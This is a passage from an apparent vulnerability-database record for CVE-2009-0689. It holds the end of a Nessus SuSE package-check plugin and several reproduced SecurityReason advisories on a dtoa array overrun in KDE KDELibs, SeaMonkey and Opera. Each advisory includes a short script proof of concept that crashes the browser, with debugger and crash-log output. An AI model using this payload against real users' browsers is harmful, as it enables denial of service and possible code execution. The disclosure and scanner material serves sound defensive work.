);\n script_set_attribute(\n attribute:\"description\", \n value:\n\"KDE KDELibs Remote Array Overrun (Arbitrary code execution),\nCVE-2009-0689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0689.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6692.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"kdelibs3-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"kdelibs3-arts-3.5.1-49.53.1\")) flag++;\nif 
(rpm_check(release:\"SLED10\", sp:3, reference:\"kdelibs3-devel-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"kdelibs3-doc-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"kdelibs3-arts-32bit-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"kdelibs3-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"kdelibs3-arts-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"kdelibs3-devel-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"kdelibs3-doc-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"kdelibs3-arts-32bit-3.5.1-49.53.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:24", "description": "\nKDE KDELibs 4.3.3 - Remote Array Overrun", "edition": 1, "published": "2009-11-19T00:00:00", "title": "KDE KDELibs 4.3.3 - Remote Array Overrun", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EXPLOITPACK:16C37B6C3C517D65315351878DA06F27", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]\n\nAuthor: Maksymilian Arciemowicz and sp3x\nhttp://SecurityReason.com\nDate:\n- - Dis.: 07.05.2009\n- - Pub.: 20.11.2009\n\nCVE: CVE-2009-0689\nRisk: High\nRemote: Yes\n\nAffected Software:\n- - 
KDELibs 4.3.3\n\nNOTE: Prior versions may also be affected.\n\nOriginal URL:\nhttp://securityreason.com/achievement_securityalert/74\n\n\n- --- 0.Description ---\nKDELibs is a collection of libraries built on top of Qt that provides\nframeworks and functionality for developers of KDE-compatible software.\nThe KDELibs libraries are licensed under LGPL.\n\n\n- --- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code\nexecution) ---\nThe main problem exist in dtoa implementation. KDE has a very similar\ndtoa algorithm to the BSD, Chrome and Mozilla products. Problem exist\nin dtoa.cpp file\n\nhttp://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup\n\nand it is the same like SREASONRES:20090625.\n\nhttp://securityreason.com/achievement_securityalert/63\n\nbut fix for SREASONRES:20090625, used by openbsd was not good.\nMore information about fix for openbsd and similars SREASONRES:20091030,\n\nhttp://securityreason.com/achievement_securityalert/69\n\nWe can create any number of float, which will overwrite the memory. In\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and\nit is possible to call 16<= elements of freelist array.\n\n\n- --- 2. Proof of Concept (PoC) ---\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"9\",299999); ?>;\n</script>\n- -----------------------\n\nIf we use konqueror to see this PoC, konqueror will crash. 
For example\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\n</script>\n- -----------------------\n\nProgram received signal SIGSEGV, Segmentation fault.\n[Switching to process 24845, thread 0x7e6e6800]\n0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\n\n0x06db85c3 <diff+163>: mov %esi,(%ecx)\n\n#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\n#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0\n#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0\n#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0\n#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0\n#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0\n#6 0x0908337f in KJS::InterpreterImp::evaluate ()\n\n(gdb) i r\neax 0x0 0\necx 0x220ff000 571469824\nedx 0x0 0\nebx 0x220fbb00 571456256\nesp 0xcfbc04e0 0xcfbc04e0\nebp 0xcfbc0518 0xcfbc0518\nesi 0xc71c71c7 -954437177\nedi 0x0 0\neip 0x21415c3 0x21415c3\n\nesi=0x71c71c7\n\n\n- --- 3. SecurityReason Note ---\n\nOfficialy SREASONRES:20090625 has been detected in:\n- - OpenBSD\n- - NetBSD\n- - FreeBSD\n- - MacOSX\n- - Google Chrome\n- - Mozilla Firefox\n- - Mozilla Seamonkey\n- - KDE (example: konqueror)\n- - Opera\n- - K-Meleon\n\nThis list is not yet closed. US-CERT declared that will inform all\nvendors about this issue, however, they did not do it. Even greater\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\nwas aware that the problem affects other products like ( KDE, Chrome )\nand it is based on \"CVE-2009-0689\". 
After some time Mozilla Foundation\nSecurity Advisory\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\nwas updated with note :\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\nessentially the same as that reported against the libc gdtoa routine by\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\njavascript (from Secunia), forced us to official notification all other\nvendors. We publish all the individual advisories, to formally show all\nvulnerable software and to avoid wrong CVE number. We do not see any\nother way to fix this issue in all products.\n\n\n- --- 4. Fix ---\nNetBSD fix (optimal):\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\n\nOpenBSD fix:\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa
/strtorf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\n\n\n- --- 5. Credits ---\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\n\n\n- --- 6. 
Greets ---\nInfospec p_e_a pi3\n\n\n- --- 7. Contact ---\nEmail:\n- - cxib {a.t] securityreason [d0t} com\n- - sp3x {a.t] securityreason [d0t} com\n\nGPG:\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\n- - http://securityreason.com/key/sp3x.gpg\n\nhttp://securityreason.com/\nhttp://securityreason.pl/\n\n\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAksF4lEACgkQpiCeOKaYa9ZD+ACfSoaEiTeQrFDgtcHgOckyXMom\nTE4AoJW3meP7KP6Xb7KNErVlsluLUO8E\n=jTmp\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:47", "description": "\nSeaMonkey 1.1.8 - Remote Array Overrun", "edition": 1, "published": "2009-11-19T00:00:00", "title": "SeaMonkey 1.1.8 - Remote Array Overrun", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EXPLOITPACK:A769E84172D8627C1FB28EFC5E28E482", "href": "", "sourceData": "From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221\n\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]\n\nAuthor: Maksymilian Arciemowicz and sp3x\nhttp://SecurityReason.com\nDate:\n- - Dis.: 07.05.2009\n- - Pub.: 20.11.2009\n\nCVE: CVE-2009-0689\nRisk: High\nRemote: Yes\n\nAffected Software:\n- - SeaMonkey 1.1.18\n\nFixed in:\n- - SeaMonkey 2.0\n\nNOTE: Prior versions may also be affected.\n\nOriginal URL:\nhttp://securityreason.com/achievement_securityalert/71\n\n\n- --- 0.Description ---\nThe SeaMonkey project is a community effort to develop the SeaMonkey\nall-in-one internet application suite (see below). Such a software suite\nwas previously made popular by Netscape and Mozilla, and the SeaMonkey\nproject continues to develop and deliver high-quality updates to this\nconcept. 
Containing an Internet browser, email & newsgroup client with\nan included web feed reader, HTML editor, IRC chat and web development\ntools, SeaMonkey is sure to appeal to advanced users, web developers and\ncorporate users.\n\n\n- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code\nexecution) ---\nThe main problem exist in dtoa implementation. SeaMonkey has the same\ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in\nFirefox 3.5.4 and fix\n\nhttp://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42\n\nhas been used to patch SeaMonkey 2.0.\n\nThis flaw has been detected in may 2009 and signed SREASONRES:20090625.\n\nhttp://securityreason.com/achievement_securityalert/63\n\nbut fix for SREASONRES:20090625, used by openbsd was not good.\nMore information about fix for openbsd and similars SREASONRES:20091030,\n\nhttp://securityreason.com/achievement_securityalert/69\n\nWe can create any number of float, which will overwrite the memory. In\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\nis possible to call 16<= elements of freelist array.\n\n\n- --- 2. Proof of Concept (PoC) ---\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"9\",299999); ?>;\n</script>\n- -----------------------\n\nIf we use SeaMonkey to see this PoC, SeaMonkey will crash. For example\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\n</script>\n- -----------------------\n\n127# gdb seamonkey-bin seamonkey-bin.core\n...\n#0 0x28df0ecb in ?? ()\n...\n(gdb) i r\neax 0x0 0\necx 0x2 2\nedx 0xbfbfd2fc -1077947652\nebx 0x28da9b6c 685415276\nesp 0xbfbfd2ac 0xbfbfd2ac\nebp 0xbfbfd2c8 0xbfbfd2c8\nesi 0xb 11\nedi 0xb 11\neip 0x28df0ecb 0x28df0ecb\n...\n\nesi = esi = 11\n\n\n- --- 3. 
SecurityReason Note ---\n\nOfficialy SREASONRES:20090625 has been detected in:\n- - OpenBSD\n- - NetBSD\n- - FreeBSD\n- - MacOSX\n- - Google Chrome\n- - Mozilla Firefox\n- - Mozilla Seamonkey\n- - KDE (example: konqueror)\n- - Opera\n- - K-Meleon\n\nThis list is not yet closed. US-CERT declared that will inform all\nvendors about this issue, however, they did not do it. Even greater\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\nwas aware that the problem affects other products like ( KDE, Chrome )\nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation\nSecurity Advisory\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\nwas updated with note :\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\nessentially the same as that reported against the libc gdtoa routine by\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\njavascript (from Secunia), forced us to official notification all other\nvendors. We publish all the individual advisories, to formally show all\nvulnerable software and to avoid wrong CVE number. We do not see any\nother way to fix this issue in all products.\n\nPlease note:\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\nalgorithm is not optimal and allows remote Denial of Service in Firefox\n3.5.5 giving long float number.\n\n\n- --- 4. 
Fix ---\nNetBSD fix (optimal):\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\n\nOpenBSD fix:\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdto
a/strtoIxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\n\n\n- --- 5. Credits ---\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\n\n\n- --- 6. Greets ---\nInfospec p_e_a pi3\n\n\n- --- 7. 
Contact ---\nEmail:\n- - cxib {a.t] securityreason [d0t} com\n- - sp3x {a.t] securityreason [d0t} com\n\nGPG:\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\n- - http://securityreason.com/key/sp3x.gpg\n\nhttp://securityreason.com/\nhttp://securityreason.pl/\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D\nZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB\n=JY6k\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpera 10.01 - Remote Array Overrun", "edition": 1, "published": "2009-11-19T00:00:00", "title": "Opera 10.01 - Remote Array Overrun", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EXPLOITPACK:BAEE9A0461F7CC4E4B3568E7D096BEFB", "href": "", "sourceData": "From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/223\n\n[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]\n\nAuthor: Maksymilian Arciemowicz and sp3x\nhttp://SecurityReason.com\nDate:\n- - Dis.: 07.05.2009\n- - Pub.: 20.11.2009\n\nCVE: CVE-2009-0689\nRisk: High\nRemote: Yes\n\nAffected Software:\n- - Opera 10.01\n- - Opera 10.10 Beta\n\nNOTE: Prior versions may also be affected.\n\nOriginal URL:\nhttp://securityreason.com/achievement_securityalert/73\n\n\n- --- 0.Description ---\nOpera is a Web browser and Internet suite developed by the Opera\nSoftware company. The browser handles common Internet-related tasks such\nas displaying Web sites, sending and receiving e-mail messages, managing\ncontacts, IRC online chatting, downloading files via BitTorrent, and\nreading Web feeds. Opera is offered free of charge for personal\ncomputers and mobile phones.\n\n\n- --- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---\nThe main problem exist in dtoa implementation. 
Opera has a very similar\ndtoa algorithm to the BSD, Chrome and Mozilla products. It is the same\nissue like SREASONRES:20090625.\n\nhttp://securityreason.com/achievement_securityalert/63\n\nbut fix for SREASONRES:20090625, used by openbsd was not good.\nMore information about fix for openbsd and similars SREASONRES:20091030,\n\nhttp://securityreason.com/achievement_securityalert/69\n\nWe can create any number of float, which will overwrite the memory. In\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\nis possible to call 16<= elements of freelist array.\n\n\n- --- 2. Proof of Concept (PoC) ---\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"9\",299999); ?>;\n</script>\n- -----------------------\n\nIf we use Opera to see this PoC, Opera will crash. For example\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\n</script>\n- -----------------------\n\nOPERA-CRASHLOG V1 desktop 10.01 1844 windows\nOpera.exe 1844 caused exception C0000005 at address 67956906 (Base: 400000)\n\nRegisters:\nEAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=42000000 ESI=C20471EC\nEDI=00000000 EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202\nCS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000\nFPU stack:\nC020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800\n3FC78000000000000000 10000000000100000000 0BBE0000000000040000\n00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F\n\n127# gdb -q opera opera.core\n...\nProgram terminated with signal 11, Segmentation fault.\n#0 0x2960307b in ?? 
()\n...\n(gdb) i r\neax 0x71c71c71 1908874353\necx 0x2aa03be4 715144164\nedx 0x0 0\nebx 0x296177f8 694253560\nesp 0xbfbfb650 0xbfbfb650\nebp 0xbfbfb698 0xbfbfb698\nesi 0x2962d000 694341632\nedi 0x0 0\neip 0x2960307b 0x2960307b\n...\n(gdb) x/100x ($esi)-90\n0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\n0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\n0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7\n0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\n0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\n0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at\naddress 0x2962cffe\n...\n\n\n- --- 3. SecurityReason Note ---\n\nOfficialy SREASONRES:20090625 has been detected in:\n- - OpenBSD\n- - NetBSD\n- - FreeBSD\n- - MacOSX\n- - Google Chrome\n- - Mozilla Firefox\n- - Mozilla Seamonkey\n- - KDE (example: konqueror)\n- - Opera\n- - K-Meleon\n\nThis list is not yet closed. US-CERT declared that will inform all\nvendors about this issue, however, they did not do it. Even greater\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\nwas aware that the problem affects other products like ( KDE, Chrome )\nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation\nSecurity Advisory\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\nwas updated with note :\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\nessentially the same as that reported against the libc gdtoa routine by\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\njavascript (from Secunia), forced us to official notification all other\nvendors. We publish all the individual advisories, to formally show all\nvulnerable software and to avoid wrong CVE number. We do not see any\nother way to fix this issue in all products.\n\n\n- --- 4. 
Fix ---\nOpera fix:\nThe vulnerability was fixed in the latest release candidate Opera RC3 :\nhttp://snapshot.opera.com/windows/Opera_1010_1890_in.exe\nIn shortly time we can expect the final verion of Opera with the fix.\n\nNetBSD fix (optimal):\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\n\nOpenBSD 